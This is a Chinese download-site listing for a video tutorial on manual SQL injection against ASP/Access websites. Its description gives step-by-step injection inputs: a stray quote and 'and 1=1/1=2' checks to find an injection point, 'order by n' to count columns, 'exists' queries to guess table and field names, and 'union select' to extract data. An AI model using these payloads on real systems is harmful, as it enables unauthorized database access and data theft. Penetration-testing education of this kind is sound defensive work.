您现在的位置:圣剑网 >> 动画教程 >> 漏洞检测 >> 实战渗透测试第二课:asp+access数据库注入
实战渗透测试第二课:asp+access数据库注入
软件大小:61.5 MB
更新时间:2016-10-31 02:05
授权方式:共享版
人气访问:158次
运行环境:Windows All 32/64位
软件评级:
分享好友:
实战渗透测试第二课:asp+access数据库注入介绍

讲师:巅峰邪恶

动画名称:渗透测试第二课  asp+access数据库注入

测试环境:Win7 系统


sql注入就是往数据库中插入sql代码,得到我们要的数据

www.xx.com/news.asp?id=1  '


select * from 表名 where id=1 '


判断是否存在注入点


提交单引号  返回错误


and 1=1     正常


and 1=2    错误


判断有几个字段   order by n n代表数字


order by n返回错误界面   n-1的时候返回正常界面   此时就有n-1个字段


order by 19 返回错误   order by 18 正确    就有18个字段


and exists(select * from 表名)   判断有没有这个表


and exists(select 字段名 from 表名)   判断有没有这个字段


利用 and 1=2 union select 1,2,3,4,5 from 表名    这段话是判断哪些字段是可以在界面显示的


and 1=2 union selct 1,字段名,3,4,5 from 表名  

实战渗透测试第二课:asp+access数据库注入下载地址
网友评论

关于圣剑 - 广告服务 - 招聘信息 - 友情连接 - 保护隐私权 - 意见反馈 - 帮助中心 - 联系我们

Copyright © 2016 Sjian.Net Inc. All Rights Reserved.大千网络科技有限公司 版权所有

不良信息举报中心 陕ICP备10005927号 陕公网安备61010402000003号